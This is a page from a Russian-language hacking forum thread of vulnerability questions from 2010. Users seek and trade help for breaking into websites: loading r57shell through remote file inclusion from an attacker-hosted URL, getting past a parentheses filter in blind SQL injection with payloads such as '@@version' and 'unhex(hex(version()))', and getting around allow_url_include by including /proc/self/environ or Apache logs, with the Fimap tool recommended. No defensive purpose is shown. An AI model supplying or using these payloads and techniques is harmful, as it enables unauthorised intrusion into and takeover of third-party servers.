Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. xFennyks

    xFennyks New Member

    Joined:
    25 Jul 2010
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    потверждение по мыло не нужно! сразу авторизует
    ну я не знаю может запрос бд какойнить сделать . подскажите а!
     
    #14281 xFennyks, 26 Jul 2010
    Last edited: 26 Jul 2010
  2. against

    against New Member

    Joined:
    3 Jun 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте!Подскажите, пожалуйста!
    Ситуация:
    Имеется инклудовый сайт, захожу на него шеллом так-
    site.ru/index.php?page=http://myevilsite.narod.ru/shell.php
    Открывается полноценное окно шелла.Но, как только пробую выполнить команду или скачать файл, вылетает из шелла обратно на страницу уже без шелла.
    Пробовал и r57shell 1.24 и другие, одинаково.
    Может быть сможете что-нибудь посоветовать.
    Windows NT VIA-008 5.2 build 3790
    Microsoft-IIS/6.0
    Заранее большое спасибо!!!
     
  3. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Сделай так, чтоб параметр page=http://myevilsite.narod.ru/shell.php оставался в адресной строке.
     
  4. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    моё мнение что нормальльный хостинг-провайдер....при загрузки в ftp.....будет банить шеллы....только ойда ушёл(у меня такая бня была ужо много раз).....
     
  5. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Нашел скулю, но там фильтруются скобки, как можно обойти данную фильтрацию? Она + еще ко всему Blind, а в Blind, насколько я знаю, без скобок никак не обойтись :(
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    0x28, 0x29
     
  7. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Не получается! Т.к. если выполнить функцию 0x76657273696F6E2829 (version()) она не будет робит. Сервак приймет это за простую строку и выведет!
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    union+select+version%28%29 :(
     
  9. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Я это тоже пробовал, после отправки %28%29 заменяется на () и снова выдает ошибку...
     
    1 person likes this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    @@version
     
    _________________________
    1 person likes this.
  11. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    ZARO
    Ты уверен что именно скобки фильтруются, мб просто дело в кодировке, попробуй =)
     
  12. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Вроде только скобки фильтруются, а если дело в кодировке, то как с этим бороться?

    Да и версию узнать не смогу =) Т.к. там blind, скобки полюбому будут....
     
  13. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    +union+select+unhex(hex(version())
     
    1 person likes this.
  14. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    попробуй
    AES_DECRYPT(AES_ENCRYPT(version()))
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    aes_decrypt(aes_encrypt(version(),1),1)

    или так? :)
     
    _________________________
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    клац

    Учимся юзать поиск на форуме..Джокестер в свое время создавал данную тему именно для того что бы в вопросах не было простых вопросов... и кстати отличное пособие для начинающих...надо запретить доступ новичков в ''Ваши вопросы по уязвимостям.''...задолбали уже...охренеть вопрос про кодировку
     
    3 people like this.
  17. php_master

    php_master New Member

    Joined:
    6 Mar 2010
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    шелл

    Ребят, помогите с заливкой шелла через инклуд... Имеется скрипт вида
    <?
    $page = $_GET['page'];
    include($page.".html");
    ?>
    не могу залить т.к. на сервере стоит allow_url_include=0, помогите обойти allow_url_include т.е как то впихнуть http:// Или ftp:// если это возможно
     
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Если стоит allow_url_include, ты ничего удаленно не приинклудишь. Пробуй инклудить енвирон, логи апача.
     
  19. php_master

    php_master New Member

    Joined:
    6 Mar 2010
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    блин(( фигово.... енвирон не пашет, т.е. вообще нет /proc/self/environ а логи апача не грузятся из за их большого размера (((
     
  20. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    если вручную не получается, попробуй тулзу Fimap
    умеет инжектить /proc/self/environ, логи сервера, открывать консоль, парсить сайты с гугла и сканить на rfi/lfi.
     
    -=SmallPox=- and h00lyshit! like this.
Thread Status:
Not open for further replies.